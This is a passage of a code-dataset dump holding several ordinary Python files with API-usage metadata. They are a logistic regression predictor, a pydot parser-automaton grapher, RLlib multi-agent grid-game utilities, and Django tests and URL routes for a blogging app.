"torch.min", "line_number": 6, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 9, "usage_type": "call"}, {"api_name": "random.random", "line_number": 18, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 19, "usage_type": "call"}, {"api_name": "torchvision.transforms.RandomErasing", "line_number": 23, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 23, "usage_type": "name"}, {"api_name": "random.random", "line_number": 26, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 29, "usage_type": "call"}, {"api_name": "random.random", "line_number": 33, "usage_type": "call"}, {"api_name": "random.random", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.flip", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.flip", "line_number": 37, "usage_type": "call"}, {"api_name": "random.random", "line_number": 39, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.rot90", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "39311911825", "text": "from sklearn.metrics import accuracy_score\nfrom logistic_regression import MyLR\nfrom Ft_array import *\nimport numpy as np\nimport pandas as pd\nimport argparse\n\nDEFAULT_FILE = \"./dataset_test.csv\"\nCLASSES = \"Hogwarts House\"\n\ndef predict(path):\n thetas = np.loadtxt(DEFAULT_SAVED_FILE)\n\n lr_classes = [MyLR(np.array(theta)) for theta in thetas]\n\n data = pd.read_csv(path)\n\n y = data[CLASSES]\n print(data)\n x = data.select_dtypes(exclude=['object']).dropna()\n\n predict = [lr.predict_(normalize_features(x)) for lr in lr_classes]\n predict = np.array(predict)\n data[CLASSES] = predict.T\n # print(predict.T)\n # unique, counts = np.unique(house_predict == y, return_counts=True)\n # print(dict(zip(unique, counts)))\n\nDEFAULT_SAVED_FILE = \".thetas\"\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"path\", type=str, default=DEFAULT_FILE, help=\"dataset_train.csv\")\n args = parser.parse_args()\n\n predict(args.path)\n\nif __name__ == '__main__':\n main()\n", "repo_name": "ygarrot/dslr_v2", "sub_path": "logreg_predict.py", "file_name": "logreg_predict.py", "file_ext": "py", "file_size_in_byte": 1011, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.loadtxt", "line_number": 12, "usage_type": "call"}, {"api_name": "logistic_regression.MyLR", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "29465812363", "text": "import pydot\nimport sys\nfrom tqdm import tqdm\n\n#\tflex lexel.l\n#\tgcc -o parser parser.tab.c lex.yy.c -lfl\n#\tdot -Tsvg parser.dot > parser.svg\n\nfile_inp = sys.argv[1]\n\ngraph = pydot.Dot(\"automata\", graph_type = \"digraph\")\ngraph.set_node_defaults(fontsize = '10')\ngraph.set_edge_defaults(fontsize = '9')\n\nnline = sum(1 for line in open(file_inp))\n# print(f\"have total of {nline} in file\")\n\nnode = \"\"\nlhs = \"\"\ntransfer_state = 0\ni = 0\n\nwith open(file_inp) as out:\n\n for line in tqdm(out, total=nline):\n\n i+=1\n\n words = line.split()\n\n if words and \"State\" == words[0] and len(words) == 2:\n # if \"State\" in words and len(words) == 2:\n # if \"State\" in line:\n node = words[1] # second word in line is node number.\n # print(f\"set node to {node} at line {i}, word is {words}\")\n continue\n\n start_node = \"S\" + node\n\n if \"go to\" in line:\n\n lhs = words[0]\n transfer_state = words[-1]\n\n end_node = \"S\" + transfer_state\n # print(f\"go to detected at line {i} from {start_node}, going to {end_node}, with {lhs}\")\n if \"shift\" in line: #shifting occurs iff its a terminal char. add green.\n # print(\"recognized a terminal character\")\n graph.add_edge(pydot.Edge(start_node, end_node, color = \"green\", label = lhs))\n\n else: # non terminal\n # print(\"recognized a non-terminal character\")\n graph.add_edge(pydot.Edge(start_node, end_node, color = \"red\", label = lhs))\n\n continue\n\n if \" accept\" in line:# accept state, add highlight!!\n\n avail = graph.get_node(start_node)\n\n if avail:\n graph.get_node(start_node)[0].set_shape(\"box\")\n\n else:\n graph.add_node(pydot.Node(start_node, shape=\"box\"))\n\n\ngraph.write_raw(\"parser.dot\")", "repo_name": "shubh101295/GodSpeed", "sub_path": "src/graph.py", "file_name": "graph.py", "file_ext": "py", "file_size_in_byte": 1889, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pydot.Dot", "line_number": 11, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 25, "usage_type": "call"}, {"api_name": "pydot.Edge", "line_number": 49, "usage_type": "call"}, {"api_name": "pydot.Edge", "line_number": 53, "usage_type": "call"}, {"api_name": "pydot.Node", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "8314681363", "text": "from collections import namedtuple\nfrom copy import deepcopy\nfrom gym.spaces import Box, Discrete\nimport matplotlib\nimport numpy as np\nimport os\nfrom typing import Dict, Optional, Any, List, Tuple\nimport yaml\n\nfrom ray.rllib import RolloutWorker, BaseEnv, Policy\nfrom ray.rllib.agents import DefaultCallbacks, Trainer\nfrom ray.rllib.agents.dqn import DQNTrainer\nfrom ray.rllib.agents.ppo import PPOTrainer\nfrom ray.rllib.evaluation import MultiAgentEpisode\nfrom ray.rllib.utils.typing import PolicyID\nfrom ray.tune.logger import UnifiedLogger\n\nRAY_DIR = f\"{os.path.expanduser('~')}/ray_results\"\n\n\nclass Agent(object):\n \"\"\"\n Container for agent params\n \"\"\"\n\n def __init__(\n self,\n policy_name: str,\n run_name: str,\n agent_num: int,\n config: Dict[str, Any],\n seed: int,\n heterogeneous: bool,\n ):\n assert policy_name in [\"ppo\", \"dqn\"], f\"unknown policy name: {policy_name}\"\n self.policy_name = policy_name\n self.run_name = run_name\n self.agent_num = agent_num\n self.config = config\n self.seed = seed\n self.heterogeneous = heterogeneous\n self.trainer = None\n self.results_dir = f\"{RAY_DIR}/{run_name}\"\n self.name = f\"{run_name}:{agent_num}\"\n self.eval_name = None\n\n\nclass Position(namedtuple(\"Position\", [\"i\", \"j\"])):\n \"\"\"\n Represents one space in the grid\n \"\"\"\n\n def __add__(self, other):\n if isinstance(other, Position):\n return Position(i=self.i + other.i, j=self.j + other.j)\n elif isinstance(other, int):\n return Position(i=self.i + other, j=self.j + other)\n elif isinstance(other, tuple):\n return Position(i=self.i + other[0], j=self.j + other[1])\n else:\n raise ValueError(\n \"A Position can only be added to an int or another Position\"\n )\n\n def __sub__(self, other):\n if isinstance(other, Position):\n return Position(i=self.i - other.i, j=self.j - other.j)\n elif isinstance(other, int):\n return Position(i=self.i - other, j=self.j - other)\n elif isinstance(other, tuple):\n return Position(i=self.i - other[0], j=self.j - other[1])\n else:\n raise ValueError(\n \"A Position can only be added to an int or another Position\"\n )\n\n def __eq__(self, other) -> bool:\n if isinstance(other, Position):\n return self.i == other.i and self.j == other.j\n if isinstance(other, (tuple, list)):\n assert (\n len(other) == 2\n ), \"Position equality comparison must be with a length-2 sequence\"\n return self.i == other[0] and self.j == other[1]\n raise ValueError(\"A Position can only be compared with a Position-like item.\")\n\n\nclass CleanerCallbacks(DefaultCallbacks):\n \"\"\"\n Callbacks for custom metrics\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n def on_episode_start(\n self,\n *,\n worker: RolloutWorker,\n base_env: BaseEnv,\n policies: Dict[PolicyID, Policy],\n episode: MultiAgentEpisode,\n env_index: Optional[int] = None,\n **kwargs,\n ) -> None:\n episode.user_data[\"rewards\"] = list()\n\n def on_episode_step(\n self,\n *,\n worker: RolloutWorker,\n base_env: BaseEnv,\n episode: MultiAgentEpisode,\n env_index: Optional[int] = None,\n **kwargs,\n ) -> None:\n rewards = {}\n for agent in base_env.get_unwrapped()[0].game.agent_pos.keys():\n rewards[agent] = episode.prev_reward_for(agent)\n episode.user_data[\"rewards\"].append(rewards)\n\n def on_episode_end(\n self,\n *,\n worker: RolloutWorker,\n base_env: BaseEnv,\n policies: Dict[PolicyID, Policy],\n episode: MultiAgentEpisode,\n env_index: Optional[int] = None,\n **kwargs,\n ) -> None:\n # custom metrics get saved to the logfile\n episode.custom_metrics[\"rewards\"] = sum(\n [sum(list(rewards.values())) for rewards in episode.user_data[\"rewards\"]]\n )\n\n\nMOVES = [\n Position(0, 0), # NOOP\n Position(-1, 0), # NORTH\n Position(1, 0), # SOUTH\n Position(0, -1), # WEST\n Position(0, 1), # EAST\n]\n\nMASKS = {\n \"clean\": 0,\n \"dirty\": 1,\n \"wall\": 2,\n \"agent\": 3,\n}\n\nCOLORS = matplotlib.colors.ListedColormap(\n [\"green\", \"red\", \"grey\", \"white\"] # clean (and no agent) # dirty # agent # wall\n)\n\n\ndef grid_from_config(config: Dict[str, Any]) -> Dict[str, np.array]:\n \"\"\"\n Create grid from params\n \"\"\"\n env_config = config[\"env_config\"]\n return grid_from_layout(env_config[\"layout\"])\n\n\ndef grid_from_layout(layout: str) -> Dict[str, np.array]:\n \"\"\"\n Convert human-readable layout to grid format used internally by CleanerGame\n\n ''' { clean: dirty: agent: wall:\n XXXXX [0 0 0 0 0] [0 0 0 0 0] [0 0 0 0 0] [1 1 1 1 1]\n XADCX [0 1 0 1 0] [0 0 1 0 0] [0 1 0 0 0] [1 0 0 0 1]\n XDDAX => [0 0 0 1 0] [0 1 1 0 0] [0 0 0 1 0] [1 0 0 0 1]\n XXXXX [0 0 0 0 0] [0 0 0 0 0] [0 0 0 0 0] [1 1 1 1 1]\n ''' }\n \"\"\"\n layout = np.array(\n [\n list(line)\n for line in layout.replace(\" \", \"\").lstrip(\"\\n\").rstrip(\"\\n\").split(\"\\n\")\n ]\n )\n height = len(layout)\n width = len(layout[0])\n grid = {mask: np.zeros((height, width)) for mask in MASKS.keys()}\n num_agents = len(np.where(layout == \"A\")[0])\n grid[\"dirty\"][np.where(layout == \"D\")] = 1\n grid[\"clean\"][np.where(layout == \"C\")] = 1\n grid[\"wall\"][np.where(layout == \"X\")] = 1\n start_pos_list = np.where(layout == \"A\")\n pos_list = [(start_pos_list[0][i], start_pos_list[1][i]) for i in range(num_agents)]\n for i, j in pos_list:\n grid[\"agent\"][i][j] = 1\n grid[\"clean\"][i][j] = 1\n grid[\"dirty\"][i][j] = 0\n return grid\n\n\ndef grid_3d_to_2d(grid: Dict[str, np.array]) -> np.array:\n \"\"\"\n Squashes 4 layers into 1\n \"\"\"\n board = np.zeros(grid[\"clean\"].shape)\n board[np.where(grid[\"clean\"])] = 0\n board[np.where(grid[\"dirty\"])] = 1\n board[np.where(grid[\"wall\"])] = 2\n board[np.where(grid[\"agent\"])] = 3\n return board\n\n\ndef agent_pos_from_grid(\n grid: Dict[str, np.array], random_start: bool = False\n) -> List[Position]:\n \"\"\"\n Return a tuple of agent positions from the grid -- top to bottom, left to right by default\n \"\"\"\n agent_pos = np.where(grid[\"agent\"])\n num_agents = len(agent_pos[0])\n agent_order = (\n np.random.permutation(num_agents) if random_start else range(num_agents)\n )\n return [Position(agent_pos[0][num], agent_pos[1][num]) for num in agent_order]\n\n\ndef obs_dims(config: Dict[str, Any]) -> Tuple[int, int, int]:\n \"\"\"\n Get dimensions of agent observations\n \"\"\"\n grid = grid_from_config(config)\n dims = (len(grid[\"clean\"]), len(grid[\"clean\"][0]), 5)\n return dims\n\n\ndef create_trainer(\n policy_name: str,\n agents: Dict[str, Agent],\n config: Dict[str, Any],\n results_dir: str,\n seed: int = 1,\n heterogeneous: bool = True,\n num_workers: int = 1,\n) -> Trainer:\n \"\"\"\n Create a trainer object for the given agents and params\n \"\"\"\n obs_shape = obs_dims(config)\n obs_space = Box(0, 1, obs_shape, dtype=np.int32)\n action_space = Discrete(5)\n policy = (None, obs_space, action_space, {})\n if heterogeneous:\n multi_agent_config = {\n \"policies\": {agent_name: deepcopy(policy) for agent_name in agents.keys()},\n \"policy_mapping_fn\": lambda agent_name: agent_name,\n }\n else:\n multi_agent_config = {\n \"policies\": {\"agent_policy\": policy},\n \"policy_mapping_fn\": lambda agent_name: \"agent_policy\",\n }\n kernel_0_dim = [config[\"model_config\"][\"conv_kernel_size\"]] * 2\n kernel_1_dim = list(obs_shape[:2])\n model_config = {\n \"conv_filters\": [\n [16, kernel_0_dim, 1],\n [32, kernel_1_dim, 1],\n ],\n \"conv_activation\": \"relu\",\n }\n eval_config = {\"verbose\": config[\"run_config\"][\"verbose\"]}\n config[\"ray_config\"][\"num_workers\"] = num_workers\n trainer_config = {\n \"num_gpus\": int(os.environ.get(\"RLLIB_NUM_GPUS\", \"0\")),\n \"multiagent\": multi_agent_config,\n \"model\": model_config,\n \"env_config\": config[\"env_config\"],\n \"callbacks\": DefaultCallbacks,\n \"evaluation_config\": eval_config,\n \"seed\": seed,\n **config[\"ray_config\"],\n }\n\n if policy_name == \"ppo\":\n trainer = PPOTrainer(\n trainer_config,\n \"ZSC-Cleaner\",\n logger_creator=lambda cfg: UnifiedLogger(cfg, results_dir),\n )\n elif policy_name == \"dqn\":\n trainer = DQNTrainer(\n trainer_config,\n \"ZSC-Cleaner\",\n logger_creator=lambda cfg: UnifiedLogger(cfg, results_dir),\n )\n else:\n print(f\"trainer not implemented for policy: {policy_name}\")\n trainer = None\n return trainer\n\n\ndef save_trainer(trainer: Trainer, path: str = None, verbose: bool = True) -> Optional[str]:\n \"\"\"\n Save trainer to file\n \"\"\"\n save_path = trainer.save(path)\n if verbose:\n print(f\"saved trainer at {save_path}\")\n return save_path\n\n\ndef load_config(config_name: str) -> Dict[str, Any]:\n \"\"\"\n Load params from file\n \"\"\"\n fname = f\"configs/{config_name}.yaml\"\n try:\n with open(fname, \"r\") as f:\n config = yaml.safe_load(f.read())\n return config\n except FileNotFoundError:\n print(f\"bad config path: {fname}\")\n", "repo_name": "bengreenberg5/zsc-cleaner", "sub_path": "cleaner/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 9740, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.expanduser", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 31, "usage_type": "name"}, {"api_name": "collections.namedtuple", "line_number": 48, "usage_type": "call"}, {"api_name": "ray.rllib.agents.DefaultCallbacks", "line_number": 88, "usage_type": "name"}, {"api_name": "ray.rllib.RolloutWorker", "line_number": 99, "usage_type": "name"}, {"api_name": "ray.rllib.BaseEnv", "line_number": 100, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 101, "usage_type": "name"}, {"api_name": "ray.rllib.utils.typing.PolicyID", "line_number": 101, "usage_type": "name"}, {"api_name": "ray.rllib.Policy", "line_number": 101, "usage_type": "name"}, {"api_name": "ray.rllib.evaluation.MultiAgentEpisode", "line_number": 102, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 103, "usage_type": "name"}, {"api_name": "ray.rllib.RolloutWorker", "line_number": 111, "usage_type": "name"}, {"api_name": "ray.rllib.BaseEnv", "line_number": 112, "usage_type": "name"}, {"api_name": "ray.rllib.evaluation.MultiAgentEpisode", "line_number": 113, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 114, "usage_type": "name"}, {"api_name": "ray.rllib.RolloutWorker", "line_number": 125, "usage_type": "name"}, {"api_name": "ray.rllib.BaseEnv", "line_number": 126, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 127, "usage_type": "name"}, {"api_name": "ray.rllib.utils.typing.PolicyID", "line_number": 127, "usage_type": "name"}, {"api_name": "ray.rllib.Policy", "line_number": 127, "usage_type": "name"}, {"api_name": "ray.rllib.evaluation.MultiAgentEpisode", "line_number": 128, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 153, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 158, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 158, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 158, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 190, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 166, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 166, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 199, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 199, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 207, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 212, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 212, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 220, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 213, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 225, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 225, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 225, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 236, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 237, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 237, "usage_type": "name"}, {"api_name": "gym.spaces.Box", "line_number": 247, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 247, "usage_type": "attribute"}, {"api_name": "gym.spaces.Discrete", "line_number": 248, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 252, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 272, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 272, "usage_type": "attribute"}, {"api_name": "ray.rllib.agents.DefaultCallbacks", "line_number": 276, "usage_type": "name"}, {"api_name": "ray.rllib.agents.ppo.PPOTrainer", "line_number": 283, "usage_type": "call"}, {"api_name": "ray.tune.logger.UnifiedLogger", "line_number": 286, "usage_type": "call"}, {"api_name": "ray.rllib.agents.dqn.DQNTrainer", "line_number": 289, "usage_type": "call"}, {"api_name": "ray.tune.logger.UnifiedLogger", "line_number": 292, "usage_type": "call"}, {"api_name": "ray.rllib.agents.Trainer", "line_number": 242, "usage_type": "name"}, {"api_name": "ray.rllib.agents.Trainer", "line_number": 300, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 300, "usage_type": "name"}, {"api_name": "yaml.safe_load", "line_number": 317, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 310, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 310, "usage_type": "name"}]} +{"seq_id": "12843328647", "text": "import shutil\nimport tempfile\n\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.core.cache import cache\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.test import Client, TestCase, override_settings\nfrom django.urls import reverse\n\nfrom ..models import Follow, Group, Post\n\nTEMP_MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)\n\nUser = get_user_model()\n\n\n@override_settings(MEDIA_ROOT=TEMP_MEDIA_ROOT)\nclass ViewTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.user_author = User.objects.create_user(username='Author')\n cls.user_commentator = User.objects.create_user(username='Commentator')\n cls.group_test = Group.objects.create(\n title='Тестовая группа',\n slug='Grouptest',\n description='testtesttesttesttest'\n )\n\n cls.image = (\n b'\\x47\\x49\\x46\\x38\\x39\\x61\\x02\\x00'\n b'\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00'\n b'\\xFF\\xFF\\xFF\\x21\\xF9\\x04\\x00\\x00'\n b'\\x00\\x00\\x00\\x2C\\x00\\x00\\x00\\x00'\n b'\\x02\\x00\\x01\\x00\\x00\\x02\\x02\\x0C'\n b'\\x0A\\x00\\x3B'\n )\n\n cls.uploaded = SimpleUploadedFile(\n name='test_small.gif',\n content=cls.image,\n content_type='image/gif'\n )\n\n cls.post_with_img = Post.objects.create(\n text='TESTOVIEEEEEE',\n author=cls.user_author,\n image=cls.uploaded,\n group=cls.group_test,\n )\n\n @classmethod\n def tearDownClass(cls):\n super().tearDownClass()\n shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)\n\n def setUp(self):\n self.guest_client = Client()\n self.author_client = Client()\n self.author_client.force_login(self.user_author)\n self.commentator_client = Client()\n self.commentator_client.force_login(self.user_commentator)\n cache.clear()\n\n def test_sorl_thumbnail_index(self):\n \"\"\"Пост с картинкой передаётся в словаре context (profile)\"\"\"\n response = self.guest_client.get(reverse('posts:index'))\n self.assertIn(\n self.uploaded.name, response.context['page_obj'][0].image.name\n )\n\n def test_sorl_thumbnail_profile(self):\n \"\"\"Пост с картинкой передаётся в словаре context (profile)\"\"\"\n response = self.guest_client.get(\n reverse(\n 'posts:profile', kwargs={'username': self.user_author.username}\n )\n )\n self.assertIn(\n self.uploaded.name, response.context['page_obj'][0].image.name\n )\n\n def test_sorl_thumbnail_group(self):\n \"\"\"Пост с картинкой передаётся в словаре context (group_list)\"\"\"\n response = self.guest_client.get(\n reverse('posts:group_list', kwargs={'slug': self.group_test.slug})\n )\n self.assertIn(\n self.uploaded.name, response.context['page_obj'][0].image.name\n )\n\n def test_sorl_thumbnail_post_detail(self):\n \"\"\"Пост с картинкой передаётся в словаре context (post_detail)\"\"\"\n response = self.guest_client.get(\n reverse(\n 'posts:post_detail', kwargs={'post_id': self.post_with_img.pk}\n )\n )\n self.assertIn(\n self.uploaded.name, response.context['post'].image.name\n )\n\n def test_sorl_thumbnail_PostForm(self):\n \"\"\"при отправке поста с картинкой через форму\n PostForm создаётся запись в базе данных\"\"\"\n form_data = {\n 'text': 'Текст для проверки PostForm и картинки',\n 'group': self.group_test.pk,\n 'image': self.uploaded.name,\n }\n self.author_client.post(reverse('posts:post_create'), data=form_data)\n self.assertTrue(Post.objects.filter(\n text=form_data['text'],\n ).exists())\n\n def test_cache_page(self):\n \"\"\"Список постов на главной странице сайта хранится в кэше\"\"\"\n test_post_cache = Post.objects.create(\n text='Тест для проверки кэширования',\n author=self.user_author,\n )\n response = self.guest_client.get(reverse('posts:index'))\n test_post_cache.delete()\n response_cache = self.guest_client.get(reverse('posts:index'))\n\n self.assertEqual(response.content, response_cache.content)\n\n cache.clear()\n response_cache = self.guest_client.get(reverse('posts:index'))\n self.assertNotEqual(response.content, response_cache.content)\n\n def test_404(self):\n \"\"\"404 отдаёт кастомный шаблон.\"\"\"\n response = self.guest_client.get('/nothingpage')\n self.assertTemplateUsed(response, 'core/404.html')\n\n def test_1(self):\n \"\"\"Авторизованный пользовател�� может\n подписываться на других пользователей и удалять их из подписок.\"\"\"\n\n self.commentator_client.get(\n reverse(\n 'posts:profile_follow',\n kwargs={'username': self.user_author.username}\n )\n )\n self.assertTrue(\n Follow.objects.filter(author=self.user_author).exists()\n )\n\n self.commentator_client.get(\n reverse(\n 'posts:profile_unfollow',\n kwargs={'username': self.user_author.username}\n )\n )\n self.assertFalse(\n Follow.objects.filter(author=self.user_author).exists()\n )\n\n def test_2(self):\n \"\"\"\n Новая запись пользователя появляется в ленте тех,\n кто на него подписан и не появляется в ленте тех, кто не подписан.\n \"\"\"\n test_post_follow = Post.objects.create(\n text='Тестовый пост для follow',\n author=self.user_author,\n )\n test_follow = Follow.objects.create(\n user=self.user_commentator,\n author=self.user_author\n )\n response = self.commentator_client.get(reverse('posts:follow_index'))\n self.assertContains(response, test_post_follow.text)\n\n test_follow.delete()\n response = self.commentator_client.get(reverse('posts:follow_index'))\n self.assertNotContains(response, test_post_follow.text)\n", "repo_name": "arhipvp/hw05_final", "sub_path": "yatube/posts/tests/test_cache_and_img.py", "file_name": "test_cache_and_img.py", "file_ext": "py", "file_size_in_byte": 6728, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "tempfile.mkdtemp", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.settings.BASE_DIR", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 13, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 15, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 19, "usage_type": "name"}, {"api_name": "models.Group.objects.create", "line_number": 25, "usage_type": "call"}, {"api_name": "models.Group.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "models.Group", "line_number": 25, "usage_type": "name"}, {"api_name": "django.core.files.uploadedfile.SimpleUploadedFile", "line_number": 40, "usage_type": "call"}, {"api_name": "models.Post.objects.create", "line_number": 46, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 46, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 46, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 56, "usage_type": "call"}, {"api_name": "django.test.Client", "line_number": 59, "usage_type": "call"}, {"api_name": "django.test.Client", "line_number": 60, "usage_type": "call"}, {"api_name": "django.test.Client", "line_number": 62, "usage_type": "call"}, {"api_name": "django.core.cache.cache.clear", "line_number": 64, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 64, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 68, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 76, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 87, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 96, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 112, "usage_type": "call"}, {"api_name": "models.Post.objects.filter", "line_number": 113, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 113, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 113, "usage_type": "name"}, {"api_name": "models.Post.objects.create", "line_number": 119, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 119, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 119, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 123, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 125, "usage_type": "call"}, {"api_name": "django.core.cache.cache.clear", "line_number": 129, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 129, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 130, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 143, "usage_type": "call"}, {"api_name": "models.Follow.objects.filter", "line_number": 149, "usage_type": "call"}, {"api_name": "models.Follow.objects", "line_number": 149, "usage_type": "attribute"}, {"api_name": "models.Follow", "line_number": 149, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 153, "usage_type": "call"}, {"api_name": "models.Follow.objects.filter", "line_number": 159, "usage_type": "call"}, {"api_name": "models.Follow.objects", "line_number": 159, "usage_type": "attribute"}, {"api_name": "models.Follow", "line_number": 159, "usage_type": "name"}, {"api_name": "models.Post.objects.create", "line_number": 167, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 167, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 167, "usage_type": "name"}, {"api_name": "models.Follow.objects.create", "line_number": 171, "usage_type": "call"}, {"api_name": "models.Follow.objects", "line_number": 171, "usage_type": "attribute"}, {"api_name": "models.Follow", "line_number": 171, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 175, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 179, "usage_type": "call"}, {"api_name": "django.test.override_settings", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "4961997050", "text": "from django.urls import path, include\n\nfrom knox.views import LogoutView\n\nfrom .api.student import get_student_info, get_student_course_list, get_student_choice_list, create_choice\nfrom .views import UserAPIView, RegisterAPIView, LoginAPIView\n\nurlpatterns = [\n path('user/', UserAPIView.as_view()),\n path('register/', RegisterAPIView.as_view()),\n path('login/', LoginAPIView.as_view()),\n path('logout/', LogoutView.as_view(), name='knox_logout'),\n path('get_student_info/', get_student_info),\n path('get_student_course_list/', get_student_course_list),\n path('get_student_choice_list/', get_student_choice_list),\n path('create_choice/', create_choice),\n]\n", "repo_name": "SBidaibek/SanaX", "sub_path": "backend/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 679, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "views.UserAPIView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "views.UserAPIView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "views.RegisterAPIView.as_view", "line_number": 10, 